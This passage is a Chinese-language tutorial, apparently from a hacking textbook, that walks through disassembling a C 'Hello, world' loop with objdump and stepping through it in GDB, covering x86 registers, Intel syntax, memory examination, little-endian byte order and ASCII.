好的，这些都是你在基础编程课程中会学到的东西——基础但重要。大多数入门级编程课程只是教授如何阅读和编写 C 语言。请别误会，精通 C 语言非常有用，足以让你成为一个合格的程序员，但它只是整体图景中的一小部分。大多数程序员从上到下学习语言，从未看到整体图景。黑客通过了解所有这些部分在这个整体图景中的相互作用来获得优势。在编程领域看到整体图景，只需意识到 C 代码是为了编译而设计的。代码在编译成可执行二进制文件之前实际上什么也不能做。将 C 源代码视为程序是一种常见的误解，黑客每天都在利用这种误解。a.out的二进制指令是用机器语言编写的，这是一种 CPU 可以理解的基本语言。编译器被设计成将 C 代码翻译成适用于各种处理器架构的机器语言。在这种情况下，处理器属于使用x86 架构的家族。还有 Sparc 处理器架构（用于 Sun 工作站）和 PowerPC 处理器架构（用于预 Intel Mac）。每种架构都有不同的机器语言，因此编译器充当中间人——将 C 代码翻译成目标架构的机器语言。

只要编译后的程序能正常工作，普通程序员只关心源代码。但黑客意识到，编译后的程序才是实际在现实世界中执行的内容。通过对 CPU 运行方式的更好理解，黑客可以操纵运行在其上的程序。我们已经看到了第一个程序的源代码，并将其编译成了x86 架构的可执行二进制文件。但这个可执行二进制文件看起来是什么样子呢？GNU 开发工具包中包含一个名为objdump的程序，它可以用来检查编译后的二进制文件。让我们先看看main()函数被转换成的机器代码。

reader@hacking:~/booksrc $ objdump -D a.out | grep -A20 main.:
08048374 <main>:
 8048374:       55                      push   %ebp
 8048375:       89 e5                   mov    %esp,%ebp
 8048377:       83 ec 08                sub    $0x8,%esp
 804837a:       83 e4 f0                and    $0xfffffff0,%esp
 804837d:       b8 00 00 00 00          mov    $0x0,%eax
 8048382:       29 c4                   sub    %eax,%esp
 8048384:       c7 45 fc 00 00 00 00    movl   $0x0,0xfffffffc(%ebp)
 804838b:       83 7d fc 09             cmpl   $0x9,0xfffffffc(%ebp)
 804838f:       7e 02                   jle    8048393 <main+0x1f>
 8048391:       eb 13                   jmp    80483a6 <main+0x32>
 8048393:       c7 04 24 84 84 04 08    movl   $0x8048484,(%esp)
 804839a:       e8 01 ff ff ff          call   80482a0 <printf@plt>
 804839f:       8d 45 fc                lea    0xfffffffc(%ebp),%eax
 80483a2:       ff 00                   incl   (%eax)
 80483a4:       eb e5                   jmp    804838b <main+0x17>
 80483a6:       c9                      leave
 80483a7:       c3                      ret
 80483a8:       90                      nop
 80483a9:       90                      nop
 80483aa:       90                      nop
reader@hacking:~/booksrc $

objdump程序会输出过多的行，以至于无法合理地检查，因此输出被管道传输到grep，使用命令行选项仅显示正则表达式main.:之后的 20 行。每个字节都以十六进制表示法表示，这是一种基数为 16 的计数系统。你最熟悉的计数系统使用的是基数为 10 的系统，因为到了 10 就需要添加一个额外的符号。十六进制使用 0 到 9 来表示 0 到 9，但它也使用 A 到 F 来表示 10 到 15 的值。这种表示法很方便，因为一个字节包含 8 位，每一位可以是真或假。这意味着一个字节有 256（2⁸）种可能的值，所以每个字节可以用 2 个十六进制数字来描述。

最左侧开始的十六进制数字是内存地址。机器语言指令的位必须放在某个地方，这个地方就叫做内存。内存只是由带有地址的临时存储空间字节组成的集合。

就像当地街道上一排房子，每栋房子都有自己的地址一样，内存可以看作是一排字节，每个字节都有自己的内存地址。每个内存字节都可以通过其地址来访问，在这种情况下，CPU 通过访问这部分内存来检索构成编译程序的机器语言指令。较老的 Intel x86 处理器使用 32 位寻址方案，而较新的处理器使用 64 位寻址方案。32 位处理器有 2³²（或 4,294,967,296）个可能的地址，而 64 位处理器有 2⁶⁴（1.84467441 x 10¹⁹）个可能的地址。64 位处理器可以在 32 位兼容模式下运行，这允许它们快速运行 32 位代码。

上列中间的十六进制字节是x86 处理器的机器语言指令。当然，这些十六进制值只是 CPU 能够理解的二进制 1s 和 0s 字节的表现形式。但由于0101010110001001111001011000001111101100111100001…对除了处理器之外的东西没有太大用处，因此机器代码以十六进制字节的形式显示，并且每条指令都单独放在一行上，就像将一个段落拆分成句子一样。

想想看，十六进制字节本身其实也不是非常有用——这就是汇编语言的作用所在。最右侧的指令是汇编语言。汇编语言实际上只是对应机器语言指令的助记符集合。指令ret比0xc3或11000011更容易记住和理解。与 C 和其他编译语言不同，汇编语言指令与其对应的机器语言指令有一个直接的、一对一的关系。这意味着由于每个处理器架构都有不同的机器语言指令，因此每个架构也有不同的汇编语言形式。汇编语言只是程序员用来表示处理器所接受的机器语言指令的一种方式。这些机器语言指令的确切表示只是惯例和偏好的问题。虽然理论上你可以创建自己的x86 汇编语言语法，但大多数人还是坚持使用两种主要类型之一：AT&T 语法和 Intel 语法。在更大的图景的输出中显示的汇编语言是 AT&T 语法，因为几乎所有的 Linux 反汇编工具默认都使用这种语法。通过%和$符号的嘈杂前缀很容易识别 AT&T 语法（再次查看更大的图景上的示例）。可以通过向objdump提供额外的命令行选项-M intel来以 Intel 语法显示相同的代码，如下面的输出所示。

reader@hacking:~/booksrc $ objdump -M intel -D a.out | grep -A20 main.:
08048374 <main>:
 8048374:       55                      push   ebp
 8048375:       89 e5                   mov    ebp,esp
 8048377:       83 ec 08                sub    esp,0x8
 804837a:       83 e4 f0                and    esp,0xfffffff0
 804837d:       b8 00 00 00 00          mov    eax,0x0
 8048382:       29 c4                   sub    esp,eax
 8048384:       c7 45 fc 00 00 00 00    mov    DWORD PTR [ebp-4],0x0
 804838b:       83 7d fc 09             cmp    DWORD PTR [ebp-4],0x9
 804838f:       7e 02                   jle    8048393 <main+0x1f>
 8048391:       eb 13                   jmp    80483a6 <main+0x32>
 8048393:       c7 04 24 84 84 04 08    mov    DWORD PTR [esp],0x8048484
 804839a:       e8 01 ff ff ff          call   80482a0 <printf@plt>
 804839f:       8d 45 fc                lea    eax,[ebp-4]
 80483a2:       ff 00                   inc    DWORD PTR [eax]
 80483a4:       eb e5                   jmp    804838b <main+0x17>
 80483a6:       c9                      leave
 80483a7:       c3                      ret
 80483a8:       90                      nop
 80483a9:       90                      nop
 80483aa:       90                      nop
reader@hacking:~/booksrc $

个人而言，我认为 Intel 语法更易于阅读和理解，因此为了本书的目的，我将尽量坚持这种语法。无论汇编语言表示如何，处理器能理解的命令都非常简单。这些指令由一个操作和一些有时描述操作目的和/或源的额外参数组成。这些操作移动内存，执行某种基本数学运算，或者中断处理器以使其执行其他操作。最终，计算机处理器真正能做的就是这些。但就像使用相对较小的字母表写出了数百万本书一样，使用相对较小的机器指令集合可以创建无限多的可能程序。

处理器也有它们自己的一组特殊变量，称为寄存器。大多数指令使用这些寄存器来读取或写入数据，因此理解处理器的寄存器对于理解指令是至关重要的。整体图景一直在不断扩大…。

x86 处理器

8086 CPU 是第一个 x86 处理器。它由英特尔开发和制造，后来在该系列中开发了更先进的处理器：80186、80286、80386 和 80486。如果你记得在 80 年代和 90 年代人们谈论 386 和 486 处理器，他们所指的就是这些。

x86 处理器有几个寄存器，它们就像是处理器的内部变量。我现在可以抽象地谈论这些寄存器，但我认为亲自看到这些事物总是更好的。GNU 开发工具还包括一个名为 GDB 的调试器。调试器被程序员用来逐步执行编译后的程序，检查程序内存，并查看处理器寄存器。一个从未使用调试器查看程序内部工作原理的程序员就像是一个从未使用显微镜的十七世纪医生。与显微镜类似，调试器允许黑客观察机器代码的微观世界——但调试器的功能远比这个比喻所允许的强大。与显微镜不同，调试器可以从所有角度查看执行过程，暂停它，并在过程中更改任何内容。

下面，使用 GDB 显示程序开始前的处理器寄存器状态。

reader@hacking:~/booksrc $ gdb -q ./a.out
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) break main
Breakpoint 1 at 0x804837a
(gdb) run
Starting program: /home/reader/booksrc/a.out

Breakpoint 1, 0x0804837a in main ()
(gdb) info registers
eax            0xbffff894       -1073743724
ecx            0x48e0fe81       1222704769
edx            0x1      1
ebx            0xb7fd6ff4       -1208127500
esp            0xbffff800       0xbffff800
ebp            0xbffff808       0xbffff808
esi            0xb8000ce0       -1207956256
edi            0x0      0
eip            0x804837a        0x804837a <main+6>
eflags         0x286    [ PF SF IF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) quit
The program is running.  Exit anyway? (y or n) y
reader@hacking:~/booksrc $

在 main() 函数上设置了断点，以便在执行我们的代码之前停止执行。然后 GDB 运行程序，在断点处停止，并被告知显示所有处理器寄存器和它们当前的状态。

前四个寄存器（EAX, ECX, EDX 和 EBX）被称为通用寄存器。它们分别被称为累加器、计数器、数据和基址寄存器。它们用于各种目的，但主要在 CPU 执行机器指令时作为临时变量。

第二组四个寄存器（ESP, EBP, ESI 和 EDI）也是通用寄存器，但有时它们也被称为指针和索引。它们分别代表堆栈指针、基指针、源索引和目标索引。前两个寄存器被称为指针，因为它们存储 32 位地址，本质上指向内存中的那个位置。这些寄存器对程序执行和内存管理非常重要；我们稍后会更详细地讨论它们。最后两个寄存器在技术上也是指针，通常用于在需要从或向内存读取或写入数据时指向源和目标。有一些加载和存储指令使用这些寄存器，但大部分情况下，这些寄存器可以被视为简单的通用寄存器。

EIP 寄存器是 指令指针 寄存器，它指向处理器正在读取的当前指令。就像一个孩子在他阅读时用手指指着每个单词一样，处理器使用 EIP 寄存器作为其手指来读取每个指令。自然地，这个寄存器非常重要，在调试时将被大量使用。目前，它指向 0x804838a 的内存地址。

剩余的 EFLAGS 寄存器实际上由几个用于比较和内存分段的位标志组成。实际内存被分成几个不同的段，这将在后面讨论，这些寄存器跟踪这些信息。在大多数情况下，可以忽略这些寄存器，因为它们很少需要直接访问。

汇编语言

由于我们在这本书中使用 Intel 语法的汇编语言，我们的工具必须配置为使用此语法。在 GDB 中，可以通过简单地输入 set disassembly intel 或简写为 set dis intel 来设置反汇编语法为 Intel。您可以通过将命令放入家目录中的 .gdbinit 文件来配置此设置，以便每次 GDB 启动时都运行。

reader@hacking:~/booksrc $ gdb -q
(gdb) set dis intel
(gdb) quit
reader@hacking:~/booksrc $ echo "set dis intel" > ~/.gdbinit
reader@hacking:~/booksrc $ cat ~/.gdbinit
set dis intel
reader@hacking:~/booksrc $

现在 GDB 已配置为使用 Intel 语法，让我们开始理解它。Intel 语法的汇编指令通常遵循以下风格：

operation <destination>, <source>

目标和源值将是一个寄存器、一个内存地址或一个值。操作通常是直观的助记符：mov 操作将从源移动值到目标，sub 将执行减法，inc 将执行增量，等等。例如，下面的指令将把值从 ESP 移动到 EBP，然后从 ESP 中减去 8（将结果存储在 ESP 中）。

8048375:        89 e5                 mov    ebp,esp
8048377:        83 ec 08              sub    esp,0x8

也有一些操作用于控制执行流程。cmp 操作用于比较值，基本上任何以 j 开头的操作都用于跳转到代码的另一个部分（取决于比较的结果）。下面的示例首先比较位于 EBP 减 4 的 4 字节值与数字 9。接下来的指令是 jump if less than or equal to 的简写，指的是上一个比较的结果。如果该值小于或等于 9，执行将跳转到 0x8048393 处的指令。否则，执行将流向下一个指令，进行无条件跳转。如果该值不小于或等于 9，执行将跳转到 0x80483a6。

804838b:        83 7d fc 09           cmp    DWORD PTR [ebp-4],0x9
804838f:        7e 02                 jle    8048393 <main+0x1f>
8048391:        eb 13                 jmp    80483a6 <main+0x32>

这些示例来自我们之前的反汇编，并且我们的调试器已配置为使用 Intel 语法，所以让我们使用调试器在汇编指令级别逐步执行第一个程序。

-g 标志可以被 GCC 编译器用来包含额外的调试信息，这将使 GDB 能够访问源代码。

reader@hacking:~/booksrc $ gcc -g firstprog.c 
reader@hacking:~/booksrc $ ls -l a.out
-rwxr-xr-x 1 matrix users 11977 Jul 4 17:29 a.out
reader@hacking:~/booksrc $ gdb -q ./a.out
Using host libthread_db library "/lib/libthread_db.so.1".
(gdb) list
1       #include <stdio.h>
2
3       int main()
4       {
5               int i;
6               for(i=0; i < 10; i++)
7               {
 8                       printf("Hello, world!\n");
9               }
10      }
(gdb) disassemble main
Dump of assembler code for function main():
0x08048384 <main+0>:    push   ebp
*`0x08048385 <main+1>:    mov    ebp,esp 0x08048387 <main+3>:    sub    esp,0x8 0x0804838a <main+6>:    and    esp,0xfffffff0 0x0804838d <main+9>:    mov    eax,0x0 0x08048392 <main+14>:   sub    esp,eax`*
`0x08048394 <main+16>:   mov    DWORD PTR [ebp-4],0x0`
0x0804839b <main+23>:   cmp    DWORD PTR [ebp-4],0x9
0x0804839f <main+27>:   jle    0x80483a3 <main+31>
0x080483a1 <main+29>:   jmp    0x80483b6 <main+50>
0x080483a3 <main+31>:   mov    DWORD PTR [esp],0x80484d4
0x080483aa <main+38>:   call   0x80482a8 <_init+56>
0x080483af <main+43>:   lea    eax,[ebp-4]
0x080483b2 <main+46>:   inc    DWORD PTR [eax]
0x080483b4 <main+48>:   jmp    0x804839b <main+23>
0x080483b6 <main+50>:   leave
0x080483b7 <main+51>:   ret
End of assembler dump.
(gdb) break main
Breakpoint 1 at 0x8048394: file firstprog.c, line 6.
(gdb) run
Starting program: /hacking/a.out

Breakpoint 1, main() at firstprog.c:6
6               for(i=0; i < 10; i++)
(gdb) info register eip
eip            0x8048394        0x8048394
(gdb)

首先，列出源代码并显示main()函数的反汇编代码。然后，在main()函数的开始处设置一个断点，并运行程序。这个断点简单地告诉调试器在到达该点时暂停程序的执行。由于断点是在main()函数的开始处设置的，程序在执行main()函数中的任何指令之前就会遇到断点并暂停。然后，会显示 EIP（指令指针）的值。

注意，EIP 包含一个指向main()函数反汇编（以粗体显示）中的指令的内存地址。在此之前的指令（以斜体显示）统称为函数序言，由编译器生成，用于为main()函数的其余局部变量设置内存。变量需要声明在 C 中的部分原因是为了帮助构建这部分代码。调试器知道这部分代码是自动生成的，并且足够智能，可以跳过它。我们稍后会更多地讨论函数序言，但现在我们可以从 GDB 那里得到启示，跳过它。

GDB 调试器提供了一个直接检查内存的方法，使用命令x，它是examine的缩写。检查内存是任何黑客的关键技能。大多数黑客攻击都类似于魔术表演——除非你知道手法和误导，否则它们看起来神奇而神秘。在魔术和黑客攻击中，如果你只看对的地方，技巧就会很明显。这也是为什么一个好的魔术师永远不会重复同一个魔术。但是，使用像 GDB 这样的调试器，可以确定地检查、暂停、单步执行和重复程序的每个执行方面，直到需要为止。由于运行中的程序主要是处理器和内存段，检查内存是查看真正发生事情的第一种方法。

GDB 中的检查命令可以以多种方式查看内存中的特定地址。当使用此命令时，它期望两个参数：要检查的内存位置以及如何显示该内存。

显示格式也使用单字母缩写，这些缩写可以有一个可选的计数，表示要检查的项目数量。以下是一些常见的格式字母：

`o` 以八进制显示。
`x` 以十六进制显示。
`u` 以无符号、标准的十进制显示。
`t` 以二进制显示。

这些命令可以与examine命令一起使用来检查特定的内存地址。在下面的示例中，使用了 EIP 寄存器的当前地址。在 GDB 中，通常使用简写命令，甚至info register eip也可以简写为i r eip。

gdb) i r eip
eip            0x8048384        0x8048384 <main+16>
(gdb) x/o 0x8048384
0x8048384 <main+16>:    077042707
(gdb) x/x $eip
0x8048384 <main+16>:    0x00fc45c7
(gdb) x/u $eip
0x8048384 <main+16>:    16532935
(gdb) x/t $eip
0x8048384 <main+16>:    00000000111111000100010111000111
(gdb)

可以通过使用 EIP 中存储的地址来检查 EIP 指向的内存。调试器允许你直接引用寄存器，因此 $eip 等同于那一刻 EIP 包含的值。八进制值 077042707 等同于十六进制的 0x00fc45c7，也等同于十进制的 16532935，进而等同于二进制的 00000000111111000100010111000111。也可以将数字添加到检查命令的格式中，以检查目标地址的多个单元。

(gdb) x/2x $eip
0x8048384 <main+16>:    0x00fc45c7     0x83000000
(gdb) x/12x $eip
0x8048384 <main+16>:    0x00fc45c7     0x83000000     0x7e09fc7d     0xc713eb02
0x8048394 <main+32>:    0x84842404     0x01e80804     0x8dffffff     0x00fffc45
0x80483a4 <main+48>:    0xc3c9e5eb     0x90909090     0x90909090     0x5de58955
(gdb)

单个单元的默认大小是四个字节的单元，称为字。可以通过在格式字母的末尾添加大小字母来更改检查命令的显示单元大小。有效的大小字母如下：

`b` 一个单字节
`h` 一个半字，大小为两个字节
`w` 一个字，大小为四个字节
`g` 一个巨大的，大小为八字节

这有点令人困惑，因为有时术语字也指 2 字节值。在这种情况下，双字或 DWORD 指的是 4 字节值。在这本书中，字和 DWORD 都指 4 字节值。如果我在谈论一个 2 字节值，我会称它为短或半字。以下 GDB 输出显示了以各种大小显示的内存。

(gdb) x/8xb $eip
0x8048384 <main+16>:    0xc7    0x45    0xfc    0x00    0x00    0x00    0x00    0x83
(gdb) x/8xh $eip
0x8048384 <main+16>:    0x45c7  0x00fc  0x0000  0x8300  0xfc7d  0x7e09  0xeb02  0xc713
(gdb) x/8xw $eip
0x8048384 <main+16>:    0x00fc45c7      0x83000000      0x7e09fc7d      0xc713eb02
0x8048394 <main+32>:    0x84842404      0x01e80804      0x8dffffff      0x00fffc45 
(gdb)

如果仔细观察，你可能会注意到数据中有些奇怪的地方。第一个 xamine 命令显示了前八个字节，自然地，使用更大单元的 xamine 命令会显示更多的数据。然而，第一个 xamine 显示的前两个字节是 0xc7 和 0x45，但当在确切的相同内存地址检查半字时，显示的值是 0x45c7，字节顺序相反。当以 0x00fc45c7 显示完整的四个字节时，也可以看到相同的字节反转效果，但当逐字节显示前四个字节时，它们的顺序是 0xc7, 0x45, 0xfc 和 0x00。

这是因为在 x86 处理器上，值以 小端字节序 存储的，这意味着最低有效字节首先存储。例如，如果要将四个字节解释为单个值，则必须以相反的顺序使用字节。GDB 调试器足够智能，知道值是如何存储的，因此当检查字或半字时，必须反转字节以在十六进制中显示正确的值。重新查看以十六进制和无符号十进制显示的这些值可能有助于消除任何混淆。

(gdb) x/4xb $eip
0x8048384 <main+16>:    0xc7    0x45    0xfc    0x00
(gdb) x/4ub $eip
0x8048384 <main+16>:    199     69      252     0
(gdb) x/1xw $eip
0x8048384 <main+16>:    0x00fc45c7
(gdb) x/1uw $eip
0x8048384 <main+16>:    16532935
(gdb) quit
The program is running.  Exit anyway? (y or n) y
reader@hacking:~/booksrc $ bc -ql
199*(256³) + 69*(256²) + 252*(256¹) + 0*(256⁰)
3343252480
0*(256³) + 252*(256²) + 69*(256¹) + 199*(256⁰)
16532935
quit
reader@hacking:~/booksrc $

前四个字节同时以十六进制和标准无符号十进制表示。使用名为 bc 的命令行计算器程序来显示，如果字节以错误的顺序解释，结果将是可怕的错误值 3343252480。给定架构的字节序是一个需要了解的重要细节。虽然大多数调试工具和编译器会自动处理字节序的细节，但最终你将直接自己操作内存。

除了转换字节顺序外，GDB 还可以使用 examine 命令进行其他转换。我们已经看到 GDB 可以将机器语言指令反汇编成人类可读的汇编指令。examine 命令也接受格式字母 i，代表 instruction，以显示内存为反汇编的汇编语言指令。

reader@hacking:~/booksrc $ gdb -q ./a.out
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) break main
Breakpoint 1 at 0x8048384: file firstprog.c, line 6.
(gdb) run
Starting program: /home/reader/booksrc/a.out

Breakpoint 1, main () at firstprog.c:6
6         for(i=0; i < 10; i++)
(gdb) i r $eip
eip            0x8048384        0x8048384 <main+16>
(gdb) x/i $eip
0x8048384 <main+16>:    mov    DWORD PTR [ebp-4],0x0
(gdb) x/3i $eip
0x8048384 <main+16>:    mov    DWORD PTR [ebp-4],0x0
0x804838b <main+23>:    cmp    DWORD PTR [ebp-4],0x9
0x804838f <main+27>:    jle    0x8048393 <main+31>
(gdb) x/7xb $eip
0x8048384 <main+16>:    0xc7    0x45    0xfc    0x00    0x00    0x00    0x00
(gdb) x/i $eip
0x8048384 <main+16>:    mov    DWORD PTR [ebp-4],0x0
(gdb)

在上面的输出中，a.out 程序在 GDB 中运行，并在 main() 处设置了断点。由于 EIP 寄存器指向实际包含机器语言指令的内存，它们反汇编得相当好。

之前的 objdump 汇编确认，EIP 所指向的七个字节实际上是对应汇编指令的机器语言。

	8048384:      c7 45 fc 00 00 00 00   mov   DWORD PTR [ebp-4],0x0

这个汇编指令会将值 0 移入存储在 EBP 寄存器地址减 4 的内存中。这是 C 变量 i 在内存中的存储位置；i 被声明为一个占用 4 个字节的整数，在 x86 处理器上。基本上，这个命令会将循环中的变量 i 清零。如果现在检查这个内存，它将只包含随机垃圾。这个位置的内存可以通过几种不同的方式进行检查。

(gdb) i r ebp
ebp            0xbffff808       0xbffff808
(gdb) x/4xb $ebp - 4
0xbffff804:     0xc0    0x83    0x04    0x08
(gdb) x/4xb 0xbffff804
0xbffff804:     0xc0    0x83    0x04    0x08
(gdb) print $ebp - 4
$1 = (void *) 0xbffff804
(gdb) x/4xb $1
0xbffff804:     0xc0    0x83    0x04    0x08
(gdb) x/xw $1
0xbffff804:     0x080483c0
(gdb

EBP 寄存器显示包含地址 0xbffff808，汇编指令将写入比这低 4 个偏移量的值，即 0xbffff804。可以使用 examine 命令直接检查这个内存地址，或者通过即时计算。print 命令也可以用来进行简单的数学运算，但结果存储在调试器的临时变量中。这个名为 $1 的变量可以在以后快速重新访问内存中的特定位置。上述任何一种方法都可以完成相同的任务：显示在当前指令执行时将被清零的内存中的 4 个垃圾字节。

让我们使用 nexti 命令执行当前指令，它代表 next instruction。处理器将读取 EIP 中的指令，执行它，并将 EIP 前进到下一个指令。

(gdb) nexti
0x0804838b      6        for(i=0; i < 10; i++)
(gdb) x/4xb $1
0xbffff804:     0x00   0x00    0x00    0x00
(gdb) x/dw $1
0xbffff804:     0
(gdb) i r eip
eip            0x804838b       0x804838b <main+23>
(gdb) x/i $eip
0x804838b <main+23>:    cmp   DWORD PTR [ebp-4],0x9
(gdb)

如预测的那样，之前的命令将 EBP 减 4 找到的 4 个字节清零，这是为 C 变量 i 预留的内存。然后 EIP 前进到下一个指令。接下来的几个指令实际上更值得作为一个组来讨论。

(gdb) x/10i $eip
0x804838b <ma in+23>:   cmp   DWORD PTR [ebp-4],0x9
0x804838f <main+27>:   jle   0x8048393 <main+31>
0x8048391 <main+29>:   jmp   0x80483a6 <main+50>
`0x8048393 <main+31>:   mov   DWORD PTR [esp],0x8048484`
0x804839a <main+38>:   call  0x80482a0 <printf@plt>
0x804839f <main+43>:   lea   eax,[ebp-4]
0x80483a2 <main+46>:   inc   DWORD PTR [eax]
0x80483a4 <main+48>:   jmp   0x804838b <main+23>
0x80483a6 *`<main+50>:   leave`*
0x80483a7 <main+51>:   ret
(gdb)

第一条指令，cmp，是一个比较指令，它将 C 变量 i 所使用的内存与值 9 进行比较。下一条指令，jle，代表 跳转如果小于或等于。它使用前一次比较的结果（实际上存储在 EFLAGS 寄存器中）来决定是否将 EIP 跳转到代码的不同部分。如果前一次比较操作的目标小于或等于源，则执行跳转。在这种情况下，指令表示如果 C 变量 i 存储在内存中的值小于或等于 9，则跳转到地址 0x8048393。如果不是这种情况，EIP 将继续执行下一条指令，这是一条无条件跳转指令。这将导致 EIP 跳转到地址 0x80483a6。这三条指令组合起来创建了一个 if-then-else 控制结构：如果 i 小于或等于 9，则跳转到地址 0x8048393 的指令；否则，跳转到地址 0x80483a6。0x8048393 的第一个地址（加粗显示）是固定跳转指令之后的指令，而 0x80483a6 的第二个地址（斜体显示）位于函数的末尾。

由于我们知道值 0 存储在正在与值 9 进行比较的内存位置中，并且我们知道 0 小于或等于 9，因此在执行下两条指令后，EIP 应该位于 0x8048393。

(gdb) nexti
0x0804838f      6          for(i=0; i < 10; i++)
(gdb) x/i $eip
0x804838f <main+27>:     jle    0x8048393 <main+31>
(gdb) nexti
8            printf("Hello, world!\n");
(gdb) i r eip
eip            0x8048393        0x8048393 <main+31>
(gdb) x/2i $eip
0x8048393 <main+31>:    mov    DWORD PTR [esp],0x8048484
0x804839a <main+38>:    call   0x80482a0 <printf@plt>
(gdb)

如预期的那样，前两条指令让程序执行流程下转到 0x8048393，这带我们来到了下两条指令。第一条指令是另一个 mov 指令，它将地址 0x8048484 写入 ESP 寄存器所包含的内存地址。但 ESP 指向的是什么？

	(gdb) i r esp
	esp           0xbffff800       0xbffff800
	(gdb)

目前，ESP 指向内存地址 0xbffff800，因此当执行 mov 指令时，地址 0x8048484 被写入那里。但为什么？内存地址 0x8048484 有什么特别之处？有一种方法可以找出答案。

	(gdb) x/2xw 0x8048484
	0x8048484:      0x6c6c6548      0x6f57206f
	(gdb) x/6xb 0x8048484
	0x8048484:      0x48    0x65    0x6c   0x6c   0x6f   0x20
	(gdb) x/6ub 0x8048484
	0x8048484:      72      101     108    108    111 32
	(gdb)

有经验的眼睛可能会注意到这里内存的一些情况，特别是字节的范围。经过足够长时间的内存检查，这些类型的视觉模式会变得更加明显。这些字节位于可打印的 ASCII 范围内。ASCII 是一个协议，将键盘上的所有字符（以及一些不是的字符）映射到固定的数字。字节 0x48, 0x65, 0x6c 和 0x6f 都对应于下面显示的 ASCII 表中的字母。这个表可以在 ASCII 的 man 页面上找到，大多数 Unix 系统中可以通过输入 man ascii 来访问。

ASCII 表

	Oct   Dec   Hex   Char           Oct   Dec   Hex   Char
	------------------------------------------------------------
	000   0     00    NUL '\0'       100   64    40    @
	001   1     01    SOH            101   65    41    A
	002   2     02    STX            102   66    42    B
	003   3     03    ETX            103   67    43    C
	004   4     04    EOT            104   68    44    D
	005   5     05    ENQ            105   69    45    E
	006   6     06    ACK            106   70    46    F
	007   7     07    BEL '\a'       107   71    47    G
	010   8     08    BS  '\b'       `110   72    48    H`
	011   9     09    HT  '\t'       111   73    49    I
	012   10    0A    LF  '\n'       112   74    4A    J
	013   11    0B    VT  '\v'       113   75    4B    K
	014   12    0C    FF  '\f'       114   76    4C    L
	015   13    0D    CR  '\r'       115   77    4D    M
	016   14    0E    SO             116   78    4E    N
	017   15    0F    SI             117   79    4F    O
	020   16    10    DLE            120   80    50    P
	021   17    11    DC1            121   81    51    Q
	022   18    12    DC2            122   82    52    R
	023   19    13    DC3            123   83    53    S
	024   20    14    DC4            124   84    54    T
	025   21    15    NAK            125   85    55    U
	026   22    16    SYN            126   86    56    V
	027   23    17    ETB            127   87    57    W
	030   24    18    CAN            130   88    58    X
	031   25    19    EM             131   89    59    Y
	032   26    1A    SUB            132   90    5A    Z
	033   27    1B    ESC            133   91    5B    [
	034   28    1C    FS             134   92    5C    \   '\\'
	035   29    1D    GS             135   93    5D    ]
	036   30    1E    RS             136   94    5E    ^
	037   31    1F    US             137   95    5F    _
	040   32    20    SPACE          140   96    60    `
	041   33    21    !              141   97    61    a
	042   34    22    "              142   98    62    b
	043   35    23    #              143   99    63    c
	044   36    24    $              144   100   64    d
	045   37    25    %              `145   101   65    e`
	046   38    26    &              146   102   66    f
	047   39    27    '              147   103   67    g
	050   40    28    (              150   104   68    h
	051   41    29    )              151   105   69    i
	052   42    2A    *              152   106   6A    j
	053   43    2B    +              153   107   6B    k
	054   44    2C    ,              `154  108   6C     l`
	055   45    2D    -              155   109   6D    m
	056   46    2E    .              156   110   6E    n
	057   47    2F    /              `157  111   6F    o`
	060   48    30    0              160   112   70    p
	061   49    31    1              161   113   71    q
	062   50    32    2              162   114   72    r
	063   51    33    3              163   115   73    s
	064   52    34    4              164   116   74    t
	065   53    35    5              165   117   75    u
	066   54    36    6              166   118   76    v
	067   55    37    7              167   119   77    w
	070   56    38    8              170   120   78    x
	071   57    39    9              171   121   79    y
	072   58    3A    :              172   122   7A    z
	073   59    3B    ;              173   123   7B    {
	074   60    3C    <              174   124   7C    |
	075   61    3D    =              175   125   7D    }
	076   62    3E    >              176   126   7E    ~
	077   63    3F    ?              177   127   7F    DEL

幸运的是，GDB 的 examine 命令也包含查看此类内存的条款。可以使用 c 格式字母自动查找 ASCII 表上的字节，而 s 格式字母将显示整个字符串字符数据。

(gdb) x/6cb 0x8048484
0x8048484:      72 'H'  101 'e' 108 'l' 108 'l' 111 'o' 32 ' '
(gdb) x/s 0x8048484
0x8048484:       "Hello, world!\n"
(gdb)

这些命令显示数据字符串 "Hello, world!\n" 存储在内存地址 0x8048484。这个字符串是 printf() 函数的参数，这表明将这个字符串的地址移动到 ESP (0x8048484) 中与这个函数有关。下面的输出显示了数据字符串的地址被移动到 ESP 指向的地址。

(gdb) x/2i $eip
0x8048393 <main+31>:    mov    DWORD PTR [esp],0x8048484
0x804839a <main+38>:    call   0x80482a0 <printf@plt>
(gdb) x/xw $esp
0xbffff800:     0xb8000ce0
(gdb) nexti
0x0804839a      8           printf("Hello, world!\n");
(gdb) x/xw $esp
0xbffff800:     0x08048484 
(gdb)

下一条指令实际上是 printf() 函数；它打印数据字符串。前面的指令是为函数调用做准备，函数调用的结果可以在下面的输出中用粗体看到。

(gdb) x/i $eip
0x804839a <main+38>:    call   0x80482a0 <printf@plt>
(gdb) nexti
`Hello, world!`
6         for(i=0; i < 10; i++)
(gdb)

继续使用 GDB 进行调试，让我们检查下两条指令。再次，它们作为一个组来看更有意义。

(gdb) x/2i $eip
0x804839f <main+43>:    lea    eax,[ebp-4]
0x80483a2 <main+46>:    inc    DWORD PTR [eax]
(gdb)

这两个指令基本上只是将变量 i 递增 1。lea 指令是 Load Effective Address 的缩写，它将 EBP 减 4 的熟悉地址加载到 EAX 寄存器中。此指令的执行情况如下所示。

(gdb) x/i $eip
0x804839f <main+43>:    lea    eax,[ebp-4]
(gdb) print $ebp - 4
$2 = (void *) 0xbffff804
(gdb) x/x $2
0xbffff804:     0x00000000
(gdb) i r eax
eax            0xd      13
(gdb) nexti
0x080483a2      6         for(i=0; i < 10; i++)
(gdb) i r eax
eax            0xbffff804       -1073743868
(gdb) x/xw $eax
0xbffff804:     0x00000000
(gdb) x/dw $eax
0xbffff804:     0
(gdb)

下一个 inc 指令将此地址（现在存储在 EAX 寄存器中）的值加 1。此指令的执行情况也如下所示。

gdb) x/i $eip
0x80483a2 <main+46>:    inc    DWORD PTR [eax]
(gdb) x/dw $eax
0xbffff804:     0
(gdb) nexti
0x080483a4      6         for(i=0; i < 10; i++)
(gdb) x/dw $eax
0xbffff804:     1
(gdb)

